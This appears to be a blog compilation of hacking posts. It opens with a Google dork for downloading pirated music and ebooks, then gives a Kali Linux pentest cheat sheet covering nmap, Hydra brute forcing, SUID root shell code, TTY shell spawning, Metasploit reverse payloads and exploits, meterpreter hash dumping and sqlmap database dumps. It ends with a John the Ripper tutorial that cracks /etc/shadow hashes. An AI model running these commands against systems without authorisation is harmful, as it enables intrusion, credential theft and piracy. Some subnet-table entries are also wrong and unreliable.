Download mp3 ,pdf ,zip or rar with google dork

Ever wondered how to hack Google for free music or eBooks. Well, here is a way to do that. To download free music, just enter the following query on Google search box and hit enter.

?intitle:index.of?mp3 eminem

Now, you�ll gain access to the whole index of Eminem album where in you can download the songs of your choice. Instead of eminem you can substitute the name of your favorite album. To search for the eBooks all you have to do is replace �eminem� with your favorite book name. Also replace �mp3� with �pdf� or �zip� or �rar�.

I hope you enjoy using Google for hacking stuffs on the Internet. If you�ve liked this post, please pass your comments. Cheers!

Kali Linux Cheat Sheet for Penetration Testers by rock star devil

Penetration testing (also called pen testing) is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit. Kali Linux Cheat Sheet for Penetration testers is a high level overview for typical penetration testing environment ranging from nmap, sqlmap, ipv4, enumeration, fingerprinting etc. Always view man pages if you are in doubt or the commands are not working as outlined here (can be OS based, version based  changes etc.) for the operating system you are using (such as BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I�ve also referenced some guides that I found useful in different sections and it might come in handy.

Recon and Enumeration

NMAP Commands

Nmap (�Network Mapper�) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command	Description
nmap -v -sS -A -T4 target	Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p�A -T4 target	As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target	As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 �script=smb-check-vulns �script-args=unsafe=1 192.168.1.X	Nmap script to scan for vulnerable SMB servers � WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* | grep ftp	Search nmap scripts for keywords

Router hack using nmap here.

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /'s?fs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network

Command	Description
nbtscan 192.168.1.0/24	Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip	Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don�t use nmap�

Command	Description
netdiscover -r 192.168.1.0/24	Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you�re on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

Command	Description
nbtscan 192.168.1.0/24	Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip	Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

Command	Description
python -m SimpleHTTPServer 80	Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

Command	Description
mount 192.168.1.1:/vol/share /mnt/nfs	Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs	Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no	Mount a Windows share on Windows from the command line
apt-get install smb4k -y	Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

Command	Description
nc -v 192.168.1.1 25 telnet 192.168.1.1 25	Basic versioning / fingerprinting via displayed banner

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

Command	Description
snmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f snmpenum -t 192.168.1.X onesixtyone -c names -i hosts	SNMP enumeration

DNS Zone Transfers

Command	Description
nslookup -> set type=any -> ls -d blah.com	Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com	Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:

1. Check all NS Records for Zone Transfers
2. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
3. Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
4. Check for Wildcard Resolution
5. Brute Force subdomain and host A and AAAA records given a domain and a wordlist
6. Perform a PTR Record lookup for a given IP Range or CIDR
7. Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
8. Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

 DNS Enumeration Kali - DNSReconroot:~#
 dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

Command	Description
nikto -h 192.168.1.1	Perform a nikto scan against target
dirbuster	Configure via GUI, CLI input doesn�t work most of the time

Packet Inspection

Command	Description
tcpdump tcp port 80 -w output.pcap -i eth0	tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

Command	Description
python /usr/share/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX	Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt	RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

Command	Description
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 |cut -d� � -f4	Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX	Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)	Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

Command	Description
/usr/share/wordlists	Kali word lists

Massive wordlist here at g0tm1lk�s blog

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.

Command	Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V	Hydra FTP brute force

Hydra POP3 Brute Force

Command	Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V	Hydra POP3 brute force

Hydra SMTP Brute Force

Command	Description
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V	Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15
Cracking password using Hydra guide here

Password Cracking

John The Ripper � JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

Command	Description
john �wordlist=/usr/share/wordlists/rockyou.txt hashes	JTR password cracking
john �format=descrypt �wordlist /usr/share/wordlists/rockyou.txt hash.txt	JTR forced descrypt cracking with wordlist
john �format=descrypt hash �show	JTR forced descrypt brute force cracking

Cracking password using John the Ripper guide here

Exploit Research

Ways to find exploits for enumerated hosts / services.

Command	Description
searchsploit windows 2003 | grep -i local	Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3	Use google to search exploit-db.com for exploits
grep -R �W7� /usr/share/metasploit-framework /modules/exploit/windows/*	Search metasploit modules using grep � msf search sucks a bit

Full on guide with screenshots for searching exploits here

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Command	Description
process.h, string.h, winbase.h, windows.h, winsock2.h	Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h	Linux exploit code

Build Exploit GCC

Compile exploit gcc.

Command	Description
gcc -o exploit exploit.c	Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Command	Description
gcc -m32 exploit.c -o exploit	Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

Command	Description
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe	Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl �e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity�s Canvas or Core Security Technologies� Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.
Metasploit�s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

Meterpreter Payloads

Windows reverse meterpreter payload

Command	Description
set payload windows/meterpreter/reverse_tcp	Windows reverse tcp payload

Windows VNC Meterpreter payload

Command	Description
set payload windows/vncinject/reverse_tcp set ViewOnly false	Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

Command	Description
set payload linux/meterpreter/reverse_tcp	Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Command	Description
upload file c:\\windows	Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp	Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp	Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe	Meterpreter run .exe on target � handy for executing uploaded exploits
execute -f cmd -c	Creates new channel with cmd shell
ps	Meterpreter show processes
shell	Meterpreter get shell on the target
getsystem	Meterpreter attempts priviledge escalation the target
hashdump	Meterpreter attempts to dump the hashes on the target
portfwd add �l 3389 �p 3389 �r target	Meterpreter create port forward to target machine
portfwd delete �l 3389 �p 3389 �r target	Meterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

Command	Description
use exploit/windows/smb/ms08_067_netapi	MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi	MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index	MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

Command	Description
use exploit/windows/local/bypassuac	Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

Command	Description
use auxiliary/scanner/http/dir_scanner	Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan	Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login	Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version	Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login	Metasploit Oracle Login Module

Metasploit Powershell Modules

Command	Description
use exploit/multi/script/web_delivery	Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell	Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer	Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload	Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Command	Description
run post/windows/gather/win_privs	Metasploit show privileges of current user
use post/windows/gather/credentials/gpp	Metasploit grab GPP saved passwords
load mimikatz -> wdigest	Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum	Idenitfy other machines that the supplied domain user has administrative access to

Networking

TTL Fingerprinting

Operating System	TTL Size
Windows	128
Linux	64
Solaris	255
Cisco / Network	255

IPv4

Classful IP Ranges

E.g Class A,B,C (depreciated)

Class	IP Address Range
Class A IP Address Range	0.0.0.0 � 127.255.255.255
Class B IP Address Range	128.0.0.0 � 191.255.255.255
Class C IP Address Range	192.0.0.0 � 223.255.255.255
Class D IP Address Range	224.0.0.0 � 239.255.255.255
Class E IP Address Range	240.0.0.0 � 255.255.255.255

IPv4 Private Address Ranges

Class	Range
Class A Private Address Range	10.0.0.0 � 10.255.255.255
Class B Private Address Range	172.16.0.0 � 172.31.255.255
Class C Private Address Range	192.168.0.0 � 192.168.255.255
	127.0.0.0 � 127.255.255.255

IPv4 Subnet Cheat Sheet

CIDR	Decimal Mask	Number of Hosts
/31	255.255.255.254	1 Host
/30	255.255.255.252	2 Hosts
/29	255.255.255.249	6 Hosts
/28	255.255.255.240	14 Hosts
/27	255.255.255.224	30 Hosts
/26	255.255.255.192	62 Hosts
/25	255.255.255.128	126 Hosts
/24	255.255.255.0	254 Hosts
/23	255.255.254.0	512 Host
/22	255.255.252.0	1022 Hosts
/21	255.255.248.0	2046 Hosts
/20	255.255.240.0	4094 Hosts
/19	255.255.224.0	8190 Hosts
/18	255.255.192.0	16382 Hosts
/17	255.255.128.0	32766 Hosts
/16	255.255.0.0	65534 Hosts
/15	255.254.0.0	131070 Hosts
/14	255.252.0.0	262142 Hosts
/13	255.248.0.0	524286 Hosts
/12	255.240.0.0	1048674 Hosts
/11	255.224.0.0	2097150 Hosts
/10	255.192.0.0	4194302 Hosts
/9	255.128.0.0	8388606 Hosts
/8	255.0.0.0	16777214 Hosts

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII	Character
x00	Null Byte
x08	BS
x09	TAB
x0a	LF
x0d	CR
x1b	ESC
x20	SPC
x21	!
x22	�
x23	#
x24	$
x25	%
x26	&
x27	`
x28	(
x29	)
x2a	*
x2b	+
x2c	,
x2d	�
x2e	.
x2f	/
x30	0
x31	1
x32	2
x33	3
x34	4
x35	5
x36	6
x37	7
x38	8
x39	9
x3a	:
x3b	;
x3c	<
x3d	=
x3e	>
x3f	?
x40	@
x41	A
x42	B
x43	C
x44	D
x45	E
x46	F
x47	G
x48	H
x49	I
x4a	J
x4b	K
x4c	L
x4d	M
x4e	N
x4f	O
x50	P
x51	Q
x52	R
x53	S
x54	T
x55	U
x56	V
x57	W
x58	X
x59	Y
x5a	Z
x5b	[
x5c	\
x5d	]
x5e	^
x5f	_
x60	`
x61	a
x62	b
x63	c
x64	d
x65	e
x66	f
x67	g
x68	h
x69	i
x6a	j
x6b	k
x6c	l
x6d	m
x6e	n
x6f	o
x70	p
x71	q
x72	r
x73	s
x74	t
x75	u
x76	v
x77	w
x78	x
x79	y
x7a	z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Command	Description
enable	Enters enable mode
conf t	Short for, configure terminal
(config)# interface fa0/0	Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255	Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255	Add ip to fa0/0
(config-if)# line vty 0 4	Configure vty line
(config-line)# login	Cisco set telnet password
(config-line)# password YOUR-PASSWORD	Set telnet password
# show running-config	Show running config loaded in memory
# show startup-config	Show sartup config
# show version	show cisco IOS version
# show session	display open sessions
# show ip interface	Show network interfaces
# show interface e0	Show detailed interface info
# show ip route	Show routes
# show access-lists	Show access lists
# dir file systems	Show available files
# dir all-filesystems	File information
# dir /all	SHow deleted files
# terminal length 0	No limit on terminal output
# copy running-config tftp	Copys running config to tftp server
# copy running-config startup-config	Copy startup-config to running-config

Cryptography

Hash Lengths

Hash	Size
MD5 Hash Length	16 Bytes
SHA-1 Hash Length	20 Bytes
SHA-256 Hash Length	32 Bytes
SHA-512 Hash Length	64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

Hash	Example
MD5 Hash Example	8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example	01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS	f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example	b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT	2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS	cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256	127e6fbfe24a750e72930c220a8e138275656b 8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT	c73d08de890479518ed60cf670d17faa26a4a7 1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS	eb368a2dfd38b405f014118c7d9747fcc97f4 f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512	82a9dda829eb7f8ffe9fbe49e45d47d2dad9 664fbb7adf72492e3c81ebd3e29134d9bc 12212bf83c6840f10e8246b9db54a4 859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT	e5c3ede3e49fb86592fb03f471c35ba13e8 d89b8ab65142c9a8fdafb635fa2223c24e5 558fd9313e8995019dcbec1fb58414 6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS	976b451818634a1e2acba682da3fd6ef a72adf8a7a08d7939550c244b237c72c7d4236754 4e826c0c83fe5c02f97c0373b6b1 386cc794bf0d21d2df01bb9c08a
NTLM Hash Example	b4b9b02e6f09a9bd760f388b67351e2b

Identify HASH and cracking password using Wireshark guide here

SQLMap Examples

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Command	Description
sqlmap -u http://meh.com �forms �batch �crawl=10 �cookie=jsessionid=54321 �level=5 �risk=3	Automated sqlmap scan
sqlmap -u TARGET -p PARAM �data=POSTDATA �cookie=COOKIE �level=3 �current-user �current-db �passwords �file-read=�/var/www/blah.php�	Targeted sqlmap scan
sqlmap -u �http://meh.com/meh.php?id=1� �dbms=mysql �tech=U �random-agent �dump	Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u �http://meh.com/form/� �forms	sqlmap check form for injection
sqlmap -o -u �http://meh/vuln-form� �forms -D database-name -T users �dump	sqlmap dump and crack hashes for table users on database-name.

Search exploits in metasploit

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions. Metasploit�s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011. In this guide we will look into the most important part of using Metasploit, how to search exploits within it! Yeah, like it or not, if you can�t search, then you got nada!

searchsploit

How many of you used searchsploit in Kali Linux? It�s a nice tool that updates and downloads exploits often. I use it quite extensively along with MetaSploit.

Use searchsploit to search specific exploits. You can use it like this:

root@kali:~# searchsploit wordpress denial
---------------------------------------------|---------------------------------- 
 Description                                 |  Path
---------------------------------------------|----------------------------------
WordPress <=4.0 Denial of Service Exploit    | /php/webapps/35413.php
Wordpress < 4.0.1 - Denial of Service        | /php/webapps/35414.txt
---------------------------------------------|----------------------------------
root@kali:~#

Just in case you want to search something else, you -h and it shows the help menu. Now help yourself to find more vulnerabilities.

searchsploit Help Menu - Click to expand

Pretty easy way to search exploits actually if you don�t want to learn metasploit search options. Do share if you think it helped.

Cracking password in Kali Linux using John the Ripper

John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others. Cracking password in Kali Linux using John the Ripper is very straight forward. In this post, I will demonstrate that.
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

One of the modes John the Ripper can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary or real passwords cracked before), encrypting it in the same format as the password being examined (including both the encryption algorithm and key), and comparing the output to the encrypted string. It can also perform a variety of alterations to the dictionary words and try these. Many of these alterations are also used in John�s single attack mode, which modifies an associated plaintext (such as a username with an encrypted password) and checks the variations against the hashes.
John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and then comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it takes a long time to run.
John the Ripper uses a 2 step process to cracking a password. First it will use the passwd and shadow file to create an output file. Next, you then actually use dictionary attack against that file to crack it. In short, John the Ripper will use the following two files:

/etc/passwd
/etc/shadow

Cracking password using John the Ripper

In Linux, password hash is stored in /etc/shadow file. For the sake of this exercise, I will create a new user names john and assign a simple password �password� to him.
I will also add john to sudo group, assign /bin/bash as his shell. There�s a nice article I posted last year which explains user creating in Linux in great details. It�s a good read if you are interested to know and understand the flags and this same structure can be used to almost any Linux/Unix/Solaris operating system. Also, when you create a user, you need their home directories created, so yes, go through creating user in Linux post if you have any doubts. Now, that�s enough mambo jumbo, let�s get to business.
First let�s create a user named john and assign password as his password. (very secured..yeah!)

root@kali:~# useradd -m john -G sudo -s /bin/bash
root@kali:~# passwd john
Enter new UNIX password: <password>
Retype new UNIX password: <password>
passwd: password updated successfully
root@kali:~#

Unshadowing password

Now that we have created our victim, let�s start with unshadow commands.  The unshadow command will combine the extries of /etc/passwd and /etc/shadow to create 1 file with username and password details. When you just type in unshadow, it shows you the usage anyway.

root@kali:~# unshadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
root@kali:~# unshadow /etc/passwd /etc/shadow > /root/johns_passwd

I�ve redirected the output to /root/johns_passwd file because I got the ticks for organizing things. Do what you feel like here.

Cracking process with John the Ripper

At this point we just need a dictionary file and get on with cracking. John comes with it�s own small password file and it can be located in /usr/share/john/password.lst. I�ve showed the size of that file using the following command.

root@kali:~# ls -ltrah /usr/share/john/password.lst

You can use your own password lists too or download a large one from Internet (there�s lots of dictionary file in terabyte size).

root@kali:~# john --wordlist=/usr/share/john/password.lst /root/johns_passwd 
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (john)
1g 0:00:00:06 DONE (2015-11-06 13:30) 0.1610g/s 571.0p/s 735.9c/s 735.9C/s modem..sss
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Looks like it worked. So we can now use john �show  option to list cracked passwords. Note that it�s a simple password that existed in the dictionary so it worked. If it wasn�t a simple password, then you would need a much bigger dictionary and lot longer to to crack it.

root@kali:~# john --show /root/johns_passwd 
john:password:1000:1001::/home/john:/bin/bash

1 password hash cracked, 1 left
root@kali:~#

John the Ripper advanced commands:

Now that we have completed the basics of John the Ripper and cracked a password using it, it�s possibly time to move on to bigger and more complex things. For that you should check the documentation on cracking MODES and examples of John the Ripper usage.

John the Ripper's cracking modes - Click to expand

John the Ripper�s cracking modes.

Mode descriptions here are short and only cover the basic things. Check other documentation files for information on customizing the modes.

Wordlist mode.

This is the simplest cracking mode supported by John. All you need to do is specify a wordlist (a text file containing one word per line) and some password files. You can enable word mangling rules (which are used to modify or �mangle� words producing other likely passwords). If enabled, all of the rules will be applied to every line in the wordlist file producing multiple candidate passwords from each source word. The wordlist should not contain duplicate lines. John does not sort entries in the wordlist since that would consume a lot of resources and would prevent you from making John try the candidate passwords in the order that you define (with more likely candidate passwords listed first). However, if you don�t list your candidate passwords in a reasonable order, it�d be better if you sort the wordlist alphabetically: with some hash types, John runs a bit faster if each candidate password it tries only differs from the previous one by a few characters. Most wordlists that you may find on the Net are already sorted anyway. On the other hand, if your wordlist is sorted alphabetically, you do not need to bother about some wordlist entries being longer than the maximum supported password length for the hash type you�re cracking. To give an example, for traditional DES-based crypt(3) hashes only the first 8 characters of passwords are significant. This means that if there are two or more candidate passwords in the wordlist whose first 8 characters are exactly the same, they�re effectively the same 8 character long candidate password which only needs to be tried once. As long as the wordlist is sorted alphabetically, John is smart enough to handle this special case right. In fact, it is recommended that you do not truncate candidate passwords in your wordlist file since the rest of the characters (beyond the length limit of your target hash type) are likely still needed and make a difference if you enable word mangling rules. The recommended way to sort a wordlist for use with default wordlist rule set is:

 tr A-Z a-z < SOURCE | sort -u > TARGET

See RULES for information on writing your own wordlist rules.

�Single crack� mode.

This is the mode you should start cracking with. It will use the login names, �GECOS� / �Full Name� fields, and users� home directory names as candidate passwords, also with a large set of mangling rules applied. Since the information is only used against passwords for the accounts it was taken from (and against password hashes which happened to be assigned the same salt), �single crack� mode is much faster than wordlist mode. This permits for the use of a much larger set of word mangling rules with �single crack�, and their use is always enabled with this mode. Successfully guessed passwords are also tried against all loaded password hashes just in case more users have the same password. Note that running this mode on many password files simultaneously may sometimes get more passwords cracked than it would if you ran it on the individual password files separately.

�Incremental� mode.

This is the most powerful cracking mode, it can try all possible character combinations as passwords. However, it is assumed that cracking with this mode will never terminate because of the number of combinations being too large (actually, it will terminate if you set a low password length limit or make it use a small charset), and you�ll have to interrupt it earlier. That�s one reason why this mode deals with trigraph frequencies, separately for each character position and for each password length, to crack as many passwords as possible within a limited time. To use the mode you need a specific definition for the mode�s parameters, including password length limits and the charset to use. These parameters are defined in the configuration file sections called [Incremental:MODE], where MODE is any name that you assign to the mode (it�s the name that you will need to specify on John�s command line). You can either use a pre-defined incremental mode definition or define a custom one. As of version 1.8.0, pre-defined incremental modes are �ASCII� (all 95 printable ASCII characters), �LM_ASCII� (for use on LM hashes), �Alnum� (all 62 alphanumeric characters), �Alpha� (all 52 letters), �LowerNum� (lowercase letters plus digits, for 36 total), �UpperNum� (uppercase letters plus digits, for 36 total), �LowerSpace� (lowercase letters plus space, for 27 total), �Lower� (lowercase letters), �Upper� (uppercase letters), and �Digits� (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for �LM_ASCII� (where password portions input to the LM hash halves are assumed to be truncated at length 7) and �Digits� (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download. See CONFIG and EXAMPLES for information on defining custom modes.

External mode.

You can define an external cracking mode for use with John. This is done with the configuration file sections called [List.External:MODE], where MODE is any name that you assign to the mode. The section should contain program code of some functions that John will use to generate the candidate passwords it tries. The functions are coded in a subset of C and are compiled by John at startup when you request the particular external mode on John�s command line. See EXTERNAL.

What modes should I use?

See EXAMPLES for a reasonable order of cracking modes to use.

John the Ripper - Usage Examples - Click to expand

John the Ripper usage examples.

These examples are to give you some tips on what John�s features can be used for.

Command line.

1. First, you need to get a copy of your password file. If your system uses shadow passwords, you may use John�s �unshadow� utility to obtain the traditional Unix password file, as root:

 umask 077
 unshadow /etc/passwd /etc/shadow > mypasswd

(You may need to replace the filenames as needed.)
Then make �mypasswd� available to your non-root user account that you will run John under. No further commands will need to be run as root.
If your system is ancient enough that it keeps passwords right in the world-readable /etc/passwd, simply make a copy of that file.
